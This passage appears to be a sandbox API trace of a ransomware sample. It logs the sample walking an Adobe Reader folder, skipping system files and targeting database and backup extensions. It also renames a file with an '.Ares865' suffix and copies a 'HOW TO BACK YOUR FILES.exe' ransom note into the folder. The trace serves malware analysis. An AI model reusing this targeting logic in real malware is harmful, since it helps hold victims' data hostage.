ftCreationTime.dwLowDateTime=0x7cf40b40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x53e1eea0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53e1eea0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0154.168] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0154.168] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0154.168] lstrcpyW (in: lpString1=0x2cce43a, lpString2="Reader 10.0" | out: lpString1="Reader 10.0") returned="Reader 10.0" [0154.168] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e78c8 [0154.168] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x52) returned 0x2df710 [0154.168] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e78d0 | out: ListHead=0x2e7710, ListEntry=0x2e78d0) returned 0x2e78b0 [0154.168] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x493229b0, ftCreationTime.dwHighDateTime=0x1d512c1, ftLastAccessTime.dwLowDateTime=0xe4209f40, ftLastAccessTime.dwHighDateTime=0x1d4df83, ftLastWriteTime.dwLowDateTime=0xe4209f40, ftLastWriteTime.dwHighDateTime=0x1d4df83, nFileSizeHigh=0x0, nFileSizeLow=0x12800, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sf-z-ma.exe", cAlternateFileName="")) returned 1 [0154.168] lstrcmpiW (lpString1="sf-z-ma.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0154.168] lstrcmpiW (lpString1="sf-z-ma.exe", lpString2="aoldtz.exe") returned 1 [0154.169] lstrcpyW (in: lpString1=0x2cce43a, lpString2="sf-z-ma.exe" | out: lpString1="sf-z-ma.exe") returned="sf-z-ma.exe" [0154.169] lstrlenW (lpString="sf-z-ma.exe") returned 11 [0154.169] lstrlenW (lpString="Ares865") returned 7 [0154.169] lstrcmpiW (lpString1="-ma.exe", lpString2="Ares865") returned 1 [0154.170] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\sf-z-ma.exe.Ares865") returned 48 [0154.170] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\sf-z-ma.exe" (normalized: "c:\\program files (x86)\\adobe\\sf-z-ma.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\sf-z-ma.exe.Ares865" (normalized: "c:\\program files (x86)\\adobe\\sf-z-ma.exe.ares865"), dwFlags=0x1) returned 1 [0154.173] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\sf-z-ma.exe.Ares865" (normalized: "c:\\program files (x86)\\adobe\\sf-z-ma.exe.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0xffffffff [0154.173] GetLastError () returned 0x20 [0154.173] wsprintfA (in: param_1=0x2ccd7d8, param_2="[ERROR] %S CreateFile error %i\r\n" | out: param_1="[ERROR] C:\\Program Files (x86)\\Adobe\\sf-z-ma.exe CreateFile error 32\r\n") returned 70 [0154.174] lstrlenA (lpString="[ERROR] C:\\Program Files (x86)\\Adobe\\sf-z-ma.exe CreateFile error 32\r\n") returned 70 [0154.174] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0154.174] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xa6db [0154.174] WriteFile (in: hFile=0x118, lpBuffer=0x2ccd7d8*, nNumberOfBytesToWrite=0x46, lpNumberOfBytesWritten=0x2ccd174, lpOverlapped=0x0 | out: lpBuffer=0x2ccd7d8*, lpNumberOfBytesWritten=0x2ccd174*=0x46, lpOverlapped=0x0) returned 1 [0154.176] CloseHandle (hObject=0x118) returned 1 [0154.176] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\sf-z-ma.exe.Ares865" (normalized: "c:\\program files (x86)\\adobe\\sf-z-ma.exe.ares865"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\sf-z-ma.exe" (normalized: "c:\\program files (x86)\\adobe\\sf-z-ma.exe"), dwFlags=0x1) returned 1 [0154.176] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0154.176] CloseHandle (hObject=0x0) returned 0 [0154.176] CloseHandle (hObject=0xffffffff) returned 0 [0154.176] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x493229b0, ftCreationTime.dwHighDateTime=0x1d512c1, ftLastAccessTime.dwLowDateTime=0xe4209f40, ftLastAccessTime.dwHighDateTime=0x1d4df83, ftLastWriteTime.dwLowDateTime=0xe4209f40, ftLastWriteTime.dwHighDateTime=0x1d4df83, nFileSizeHigh=0x0, nFileSizeLow=0x12800, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sf-z-ma.exe", cAlternateFileName="")) returned 0 [0154.176] FindClose (in: hFindFile=0x2ccee8 | out: hFindFile=0x2ccee8) returned 1 [0154.177] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e78d0 [0154.177] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0" [0154.177] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2df710 | out: hHeap=0x2b0000) returned 1 [0154.177] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e78c8 | out: hHeap=0x2b0000) returned 1 [0154.177] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0") returned 40 [0154.177] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0" [0154.177] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0154.177] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\how to back your files.exe"), bFailIfExists=1) returned 0 [0154.178] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0154.178] GetLastError () returned 0x0 [0154.178] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0154.178] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0154.178] CloseHandle (hObject=0x120) returned 1 [0154.178] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0154.178] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0154.178] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7cf40b40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x53e1eea0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53e1eea0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0154.178] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0154.178] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0154.179] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0154.179] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7cf40b40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x53e1eea0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53e1eea0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0154.179] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0154.179] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0154.179] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0154.179] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0154.179] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b058100, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x807ef720, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9b058100, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4268, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Benioku.htm", cAlternateFileName="")) returned 1 [0154.179] lstrcmpiW (lpString1="Benioku.htm", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0154.179] lstrcmpiW (lpString1="Benioku.htm", lpString2="aoldtz.exe") returned 1 [0154.179] lstrcmpiW (lpString1="Benioku.htm", lpString2=".") returned 1 [0154.179] lstrcmpiW (lpString1="Benioku.htm", lpString2="..") returned 1 [0154.179] lstrcmpiW (lpString1="Benioku.htm", lpString2="windows") returned -1 [0154.179] lstrcmpiW (lpString1="Benioku.htm", lpString2="bootmgr") returned -1 [0154.179] lstrcmpiW (lpString1="Benioku.htm", lpString2="temp") returned -1 [0154.179] lstrcmpiW (lpString1="Benioku.htm", lpString2="pagefile.sys") returned -1 [0154.179] lstrcmpiW (lpString1="Benioku.htm", lpString2="boot") returned -1 [0154.179] lstrcmpiW (lpString1="Benioku.htm", lpString2="ids.txt") returned -1 [0154.179] lstrcmpiW (lpString1="Benioku.htm", lpString2="ntuser.dat") returned -1 [0154.179] lstrcmpiW (lpString1="Benioku.htm", lpString2="perflogs") returned -1 [0154.179] lstrcmpiW (lpString1="Benioku.htm", lpString2="MSBuild") returned -1 [0154.179] lstrlenW (lpString="Benioku.htm") returned 11 [0154.179] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\*") returned 42 [0154.179] lstrcpyW (in: lpString1=0x2cce452, lpString2="Benioku.htm" | out: lpString1="Benioku.htm") returned="Benioku.htm" [0154.179] lstrlenW (lpString="Benioku.htm") returned 11 [0154.179] lstrlenW (lpString="Ares865") returned 7 [0154.179] lstrcmpiW (lpString1="oku.htm", lpString2="Ares865") returned 1 [0154.179] lstrlenW (lpString=".dll") returned 4 [0154.179] lstrcmpiW (lpString1="Benioku.htm", lpString2=".dll") returned 1 [0154.179] lstrlenW (lpString=".lnk") returned 4 [0154.179] lstrcmpiW (lpString1="Benioku.htm", lpString2=".lnk") returned 1 [0154.179] lstrlenW (lpString=".ini") returned 4 [0154.179] lstrcmpiW (lpString1="Benioku.htm", lpString2=".ini") returned 1 [0154.180] lstrlenW (lpString=".sys") returned 4 [0154.180] lstrcmpiW (lpString1="Benioku.htm", lpString2=".sys") returned 1 [0154.180] lstrlenW (lpString="Benioku.htm") returned 11 [0154.180] lstrlenW (lpString="bak") returned 3 [0154.180] lstrcmpiW (lpString1="htm", lpString2="bak") returned 1 [0154.180] lstrlenW (lpString="ba_") returned 3 [0154.180] lstrcmpiW (lpString1="htm", lpString2="ba_") returned 1 [0154.180] lstrlenW (lpString="dbb") returned 3 [0154.180] lstrcmpiW (lpString1="htm", lpString2="dbb") returned 1 [0154.180] lstrlenW (lpString="vmdk") returned 4 [0154.180] lstrcmpiW (lpString1=".htm", lpString2="vmdk") returned -1 [0154.180] lstrlenW (lpString="rar") returned 3 [0154.180] lstrcmpiW (lpString1="htm", lpString2="rar") returned -1 [0154.180] lstrlenW (lpString="zip") returned 3 [0154.180] lstrcmpiW (lpString1="htm", lpString2="zip") returned -1 [0154.180] lstrlenW (lpString="tgz") returned 3 [0154.180] lstrcmpiW (lpString1="htm", lpString2="tgz") returned -1 [0154.180] lstrlenW (lpString="vbox") returned 4 [0154.180] lstrcmpiW (lpString1=".htm", lpString2="vbox") returned -1 [0154.180] lstrlenW (lpString="vdi") returned 3 [0154.180] lstrcmpiW (lpString1="htm", lpString2="vdi") returned -1 [0154.180] lstrlenW (lpString="vhd") returned 3 [0154.180] lstrcmpiW (lpString1="htm", lpString2="vhd") returned -1 [0154.180] lstrlenW (lpString="vhdx") returned 4 [0154.180] lstrcmpiW (lpString1=".htm", lpString2="vhdx") returned -1 [0154.180] lstrlenW (lpString="avhd") returned 4 [0154.180] lstrcmpiW (lpString1=".htm", lpString2="avhd") returned -1 [0154.180] lstrlenW (lpString="db") returned 2 [0154.180] lstrcmpiW (lpString1="tm", lpString2="db") returned 1 [0154.180] lstrlenW (lpString="db2") returned 3 [0154.180] lstrcmpiW (lpString1="htm", lpString2="db2") returned 1 [0154.180] lstrlenW (lpString="db3") returned 3 [0154.180] lstrcmpiW (lpString1="htm", lpString2="db3") returned 1 [0154.181] lstrlenW (lpString="dbf") returned 3 [0154.181] lstrcmpiW (lpString1="htm", lpString2="dbf") returned 1 [0154.181] lstrlenW (lpString="mdf") returned 3 [0154.181] lstrcmpiW (lpString1="htm", lpString2="mdf") returned -1 [0154.181] lstrlenW (lpString="mdb") returned 3 [0154.181] lstrcmpiW (lpString1="htm", lpString2="mdb") returned -1 [0154.181] lstrlenW (lpString="sql") returned 3 [0154.181] lstrcmpiW (lpString1="htm", lpString2="sql") returned -1 [0154.181] lstrlenW (lpString="sqlite") returned 6 [0154.181] lstrcmpiW (lpString1="ku.htm", lpString2="sqlite") returned -1 [0154.181] lstrlenW (lpString="sqlite3") returned 7 [0154.181] lstrcmpiW (lpString1="oku.htm", lpString2="sqlite3") returned -1 [0154.181] lstrlenW (lpString="sqlitedb") returned 8 [0154.181] lstrcmpiW (lpString1="ioku.htm", lpString2="sqlitedb") returned -1 [0154.181] lstrlenW (lpString="xml") returned 3 [0154.181] lstrcmpiW (lpString1="htm", lpString2="xml") returned -1 [0154.181] lstrlenW (lpString="$er") returned 3 [0154.181] lstrcmpiW (lpString1="htm", lpString2="$er") returned 1 [0154.181] lstrlenW (lpString="4dd") returned 3 [0154.181] lstrcmpiW (lpString1="htm", lpString2="4dd") returned 1 [0154.181] lstrlenW (lpString="4dl") returned 3 [0154.181] lstrcmpiW (lpString1="htm", lpString2="4dl") returned 1 [0154.181] lstrlenW (lpString="^^^") returned 3 [0154.181] lstrcmpiW (lpString1="htm", lpString2="^^^") returned 1 [0154.181] lstrlenW (lpString="abs") returned 3 [0154.181] lstrcmpiW (lpString1="htm", lpString2="abs") returned 1 [0154.181] lstrlenW (lpString="abx") returned 3 [0154.181] lstrcmpiW (lpString1="htm", lpString2="abx") returned 1 [0154.181] lstrlenW (lpString="accdb") returned 5 [0154.181] lstrcmpiW (lpString1="u.htm", lpString2="accdb") returned 1 [0154.181] lstrlenW (lpString="accdc") returned 5 [0154.181] lstrcmpiW (lpString1="u.htm", lpString2="accdc") returned 1 [0154.181] lstrlenW (lpString="accde") returned 5 [0154.181] lstrcmpiW (lpString1="u.htm", lpString2="accde") returned 1 [0154.181] lstrlenW (lpString="accdr") returned 5 [0154.181] lstrcmpiW (lpString1="u.htm", lpString2="accdr") returned 1 [0154.182] lstrlenW (lpString="accdt") returned 5 [0154.182] lstrcmpiW (lpString1="u.htm", lpString2="accdt") returned 1 [0154.182] lstrlenW (lpString="accdw") returned 5 [0154.182] lstrcmpiW (lpString1="u.htm", lpString2="accdw") returned 1 [0154.182] lstrlenW (lpString="accft") returned 5 [0154.182] lstrcmpiW (lpString1="u.htm", lpString2="accft") returned 1 [0154.182] lstrlenW (lpString="adb") returned 3 [0154.182] lstrcmpiW (lpString1="htm", lpString2="adb") returned 1 [0154.182] lstrlenW (lpString="adb") returned 3 [0154.182] lstrcmpiW (lpString1="htm", lpString2="adb") returned 1 [0154.182] lstrlenW (lpString="ade") returned 3 [0154.182] lstrcmpiW (lpString1="htm", lpString2="ade") returned 1 [0154.182] lstrlenW (lpString="adf") returned 3 [0154.182] lstrcmpiW (lpString1="htm", lpString2="adf") returned 1 [0154.182] lstrlenW (lpString="adn") returned 3 [0154.182] lstrcmpiW (lpString1="htm", lpString2="adn") returned 1 [0154.182] lstrlenW (lpString="adp") returned 3 [0154.182] lstrcmpiW (lpString1="htm", lpString2="adp") returned 1 [0154.182] lstrlenW (lpString="alf") returned 3 [0154.182] lstrcmpiW (lpString1="htm", lpString2="alf") returned 1 [0154.182] lstrlenW (lpString="ask") returned 3 [0154.182] lstrcmpiW (lpString1="htm", lpString2="ask") returned 1 [0154.182] lstrlenW (lpString="btr") returned 3 [0154.182] lstrcmpiW (lpString1="htm", lpString2="btr") returned 1 [0154.182] lstrlenW (lpString="cat") returned 3 [0154.182] lstrcmpiW (lpString1="htm", lpString2="cat") returned 1 [0154.182] lstrlenW (lpString="cdb") returned 3 [0154.182] lstrcmpiW (lpString1="htm", lpString2="cdb") returned 1 [0154.182] lstrlenW (lpString="ckp") returned 3 [0154.182] lstrcmpiW (lpString1="htm", lpString2="ckp") returned 1 [0154.182] lstrlenW (lpString="cma") returned 3 [0154.182] lstrcmpiW (lpString1="htm", lpString2="cma") returned 1 [0154.182] lstrlenW (lpString="cpd") returned 3 [0154.182] lstrcmpiW (lpString1="htm", lpString2="cpd") returned 1 [0154.183] lstrlenW (lpString="dacpac") returned 6 [0154.183] lstrcmpiW (lpString1="ku.htm", lpString2="dacpac") returned 1 [0154.183] lstrlenW (lpString="dad") returned 3 [0154.183] lstrcmpiW (lpString1="htm", lpString2="dad") returned 1 [0154.183] lstrlenW (lpString="dadiagrams") returned 10 [0154.183] lstrcmpiW (lpString1="enioku.htm", lpString2="dadiagrams") returned 1 [0154.183] lstrlenW (lpString="daschema") returned 8 [0154.183] lstrcmpiW (lpString1="ioku.htm", lpString2="daschema") returned 1 [0154.183] lstrlenW (lpString="db-journal") returned 10 [0154.183] lstrcmpiW (lpString1="enioku.htm", lpString2="db-journal") returned 1 [0154.183] lstrlenW (lpString="db-shm") returned 6 [0154.183] lstrcmpiW (lpString1="ku.htm", lpString2="db-shm") returned 1 [0154.183] lstrlenW (lpString="db-wal") returned 6 [0154.183] lstrcmpiW (lpString1="ku.htm", lpString2="db-wal") returned 1 [0154.183] lstrlenW (lpString="dbc") returned 3 [0154.183] lstrcmpiW (lpString1="htm", lpString2="dbc") returned 1 [0154.183] lstrlenW (lpString="dbs") returned 3 [0154.183] lstrcmpiW (lpString1="htm", lpString2="dbs") returned 1 [0154.183] lstrlenW (lpString="dbt") returned 3 [0154.183] lstrcmpiW (lpString1="htm", lpString2="dbt") returned 1 [0154.183] lstrlenW (lpString="dbv") returned 3 [0154.183] lstrcmpiW (lpString1="htm", lpString2="dbv") returned 1 [0154.183] lstrlenW (lpString="dbx") returned 3 [0154.183] lstrcmpiW (lpString1="htm", lpString2="dbx") returned 1 [0154.183] lstrlenW (lpString="dcb") returned 3 [0154.183] lstrcmpiW (lpString1="htm", lpString2="dcb") returned 1 [0154.183] lstrlenW (lpString="dct") returned 3 [0154.183] lstrcmpiW (lpString1="htm", lpString2="dct") returned 1 [0154.183] lstrlenW (lpString="dcx") returned 3 [0154.183] lstrcmpiW (lpString1="htm", lpString2="dcx") returned 1 [0154.183] lstrlenW (lpString="ddl") returned 3 [0154.183] lstrcmpiW (lpString1="htm", lpString2="ddl") returned 1 [0154.183] lstrlenW (lpString="dlis") returned 4 [0154.183] lstrcmpiW (lpString1=".htm", lpString2="dlis") returned -1 [0154.183] lstrlenW (lpString="dp1") returned 3 [0154.184] lstrcmpiW (lpString1="htm", lpString2="dp1") returned 1 [0154.184] lstrlenW (lpString="dqy") returned 3 [0154.184] lstrcmpiW (lpString1="htm", lpString2="dqy") returned 1 [0154.184] lstrlenW (lpString="dsk") returned 3 [0154.184] lstrcmpiW (lpString1="htm", lpString2="dsk") returned 1 [0154.184] lstrlenW (lpString="dsn") returned 3 [0154.184] lstrcmpiW (lpString1="htm", lpString2="dsn") returned 1 [0154.184] lstrlenW (lpString="dtsx") returned 4 [0154.184] lstrcmpiW (lpString1=".htm", lpString2="dtsx") returned -1 [0154.184] lstrlenW (lpString="dxl") returned 3 [0154.184] lstrcmpiW (lpString1="htm", lpString2="dxl") returned 1 [0154.184] lstrlenW (lpString="eco") returned 3 [0154.184] lstrcmpiW (lpString1="htm", lpString2="eco") returned 1 [0154.184] lstrlenW (lpString="ecx") returned 3 [0154.184] lstrcmpiW (lpString1="htm", lpString2="ecx") returned 1 [0154.184] lstrlenW (lpString="edb") returned 3 [0154.184] lstrcmpiW (lpString1="htm", lpString2="edb") returned 1 [0154.184] lstrlenW (lpString="epim") returned 4 [0154.184] lstrcmpiW (lpString1=".htm", lpString2="epim") returned -1 [0154.184] lstrlenW (lpString="fcd") returned 3 [0154.184] lstrcmpiW (lpString1="htm", lpString2="fcd") returned 1 [0154.184] lstrlenW (lpString="fdb") returned 3 [0154.184] lstrcmpiW (lpString1="htm", lpString2="fdb") returned 1 [0154.184] lstrlenW (lpString="fic") returned 3 [0154.184] lstrcmpiW (lpString1="htm", lpString2="fic") returned 1 [0154.184] lstrlenW (lpString="flexolibrary") returned 12 [0154.184] lstrlenW (lpString="fm5") returned 3 [0154.184] lstrcmpiW (lpString1="htm", lpString2="fm5") returned 1 [0154.184] lstrlenW (lpString="fmp") returned 3 [0154.184] lstrcmpiW (lpString1="htm", lpString2="fmp") returned 1 [0154.185] lstrlenW (lpString="fmp12") returned 5 [0154.185] lstrcmpiW (lpString1="u.htm", lpString2="fmp12") returned 1 [0154.185] lstrlenW (lpString="fmpsl") returned 5 [0154.185] lstrcmpiW (lpString1="u.htm", lpString2="fmpsl") returned 1 [0154.185] lstrlenW (lpString="fol") returned 3 [0154.185] lstrcmpiW (lpString1="htm", lpString2="fol") returned 1 [0154.185] lstrlenW (lpString="fp3") returned 3 [0154.185] lstrcmpiW (lpString1="htm", lpString2="fp3") returned 1 [0154.185] lstrlenW (lpString="fp4") returned 3 [0154.185] lstrcmpiW (lpString1="htm", lpString2="fp4") returned 1 [0154.185] lstrlenW (lpString="fp5") returned 3 [0154.185] lstrcmpiW (lpString1="htm", lpString2="fp5") returned 1 [0154.185] lstrlenW (lpString="fp7") returned 3 [0154.185] lstrcmpiW (lpString1="htm", lpString2="fp7") returned 1 [0154.185] lstrlenW (lpString="fpt") returned 3 [0154.185] lstrcmpiW (lpString1="htm", lpString2="fpt") returned 1 [0154.185] lstrlenW (lpString="frm") returned 3 [0154.185] lstrcmpiW (lpString1="htm", lpString2="frm") returned 1 [0154.185] lstrlenW (lpString="gdb") returned 3 [0154.185] lstrcmpiW (lpString1="htm", lpString2="gdb") returned 1 [0154.185] lstrlenW (lpString="gdb") returned 3 [0154.185] lstrcmpiW (lpString1="htm", lpString2="gdb") returned 1 [0154.185] lstrlenW (lpString="grdb") returned 4 [0154.185] lstrcmpiW (lpString1=".htm", lpString2="grdb") returned -1 [0154.185] lstrlenW (lpString="gwi") returned 3 [0154.185] lstrcmpiW (lpString1="htm", lpString2="gwi") returned 1 [0154.185] lstrlenW (lpString="hdb") returned 3 [0154.185] lstrcmpiW (lpString1="htm", lpString2="hdb") returned 1 [0154.185] lstrlenW (lpString="his") returned 3 [0154.185] lstrcmpiW (lpString1="htm", lpString2="his") returned 1 [0154.185] lstrlenW (lpString="ib") returned 2 [0154.185] lstrcmpiW (lpString1="tm", lpString2="ib") returned 1 [0154.185] lstrlenW (lpString="idb") returned 3 [0154.185] lstrcmpiW (lpString1="htm", lpString2="idb") returned -1 [0154.185] lstrlenW (lpString="ihx") returned 3 [0154.186] lstrcmpiW (lpString1="htm", lpString2="ihx") returned -1 [0154.186] lstrlenW (lpString="itdb") returned 4 [0154.186] lstrcmpiW (lpString1=".htm", lpString2="itdb") returned -1 [0154.186] lstrlenW (lpString="itw") returned 3 [0154.186] lstrcmpiW (lpString1="htm", lpString2="itw") returned -1 [0154.186] lstrlenW (lpString="jet") returned 3 [0154.186] lstrcmpiW (lpString1="htm", lpString2="jet") returned -1 [0154.186] lstrlenW (lpString="jtx") returned 3 [0154.186] lstrcmpiW (lpString1="htm", lpString2="jtx") returned -1 [0154.186] lstrlenW (lpString="kdb") returned 3 [0154.186] lstrcmpiW (lpString1="htm", lpString2="kdb") returned -1 [0154.186] lstrlenW (lpString="kexi") returned 4 [0154.186] lstrcmpiW (lpString1=".htm", lpString2="kexi") returned -1 [0154.186] lstrlenW (lpString="kexic") returned 5 [0154.186] lstrcmpiW (lpString1="u.htm", lpString2="kexic") returned 1 [0154.186] lstrlenW (lpString="kexis") returned 5 [0154.186] lstrcmpiW (lpString1="u.htm", lpString2="kexis") returned 1 [0154.186] lstrlenW (lpString="lgc") returned 3 [0154.186] lstrcmpiW (lpString1="htm", lpString2="lgc") returned -1 [0154.186] lstrlenW (lpString="lwx") returned 3 [0154.186] lstrcmpiW (lpString1="htm", lpString2="lwx") returned -1 [0154.186] lstrlenW (lpString="maf") returned 3 [0154.186] lstrcmpiW (lpString1="htm", lpString2="maf") returned -1 [0154.186] lstrlenW (lpString="maq") returned 3 [0154.186] lstrcmpiW (lpString1="htm", lpString2="maq") returned -1 [0154.186] lstrlenW (lpString="mar") returned 3 [0154.186] lstrcmpiW (lpString1="htm", lpString2="mar") returned -1 [0154.186] lstrlenW (lpString="marshal") returned 7 [0154.186] lstrcmpiW (lpString1="oku.htm", lpString2="marshal") returned 1 [0154.186] lstrlenW (lpString="mas") returned 3 [0154.186] lstrcmpiW (lpString1="htm", lpString2="mas") returned -1 [0154.186] lstrlenW (lpString="mav") returned 3 [0154.186] lstrcmpiW (lpString1="htm", lpString2="mav") returned -1 [0154.186] lstrlenW (lpString="maw") returned 3 [0154.186] lstrcmpiW (lpString1="htm", lpString2="maw") returned -1 [0154.187] lstrlenW (lpString="mdbhtml") returned 7 [0154.187] lstrcmpiW (lpString1="oku.htm", lpString2="mdbhtml") returned 1 [0154.187] lstrlenW (lpString="mdn") returned 3 [0154.187] lstrcmpiW (lpString1="htm", lpString2="mdn") returned -1 [0154.187] lstrlenW (lpString="mdt") returned 3 [0154.187] lstrcmpiW (lpString1="htm", lpString2="mdt") returned -1 [0154.187] lstrlenW (lpString="mfd") returned 3 [0154.187] lstrcmpiW (lpString1="htm", lpString2="mfd") returned -1 [0154.187] lstrlenW (lpString="mpd") returned 3 [0154.187] lstrcmpiW (lpString1="htm", lpString2="mpd") returned -1 [0154.187] lstrlenW (lpString="mrg") returned 3 [0154.187] lstrcmpiW (lpString1="htm", lpString2="mrg") returned -1 [0154.187] lstrlenW (lpString="mud") returned 3 [0154.187] lstrcmpiW (lpString1="htm", lpString2="mud") returned -1 [0154.187] lstrlenW (lpString="mwb") returned 3 [0154.187] lstrcmpiW (lpString1="htm", lpString2="mwb") returned -1 [0154.187] lstrlenW (lpString="myd") returned 3 [0154.187] lstrcmpiW (lpString1="htm", lpString2="myd") returned -1 [0154.187] lstrlenW (lpString="ndf") returned 3 [0154.187] lstrcmpiW (lpString1="htm", lpString2="ndf") returned -1 [0154.187] lstrlenW (lpString="nnt") returned 3 [0154.187] lstrcmpiW (lpString1="htm", lpString2="nnt") returned -1 [0154.187] lstrlenW (lpString="nrmlib") returned 6 [0154.187] lstrcmpiW (lpString1="ku.htm", lpString2="nrmlib") returned -1 [0154.187] lstrlenW (lpString="ns2") returned 3 [0154.187] lstrcmpiW (lpString1="htm", lpString2="ns2") returned -1 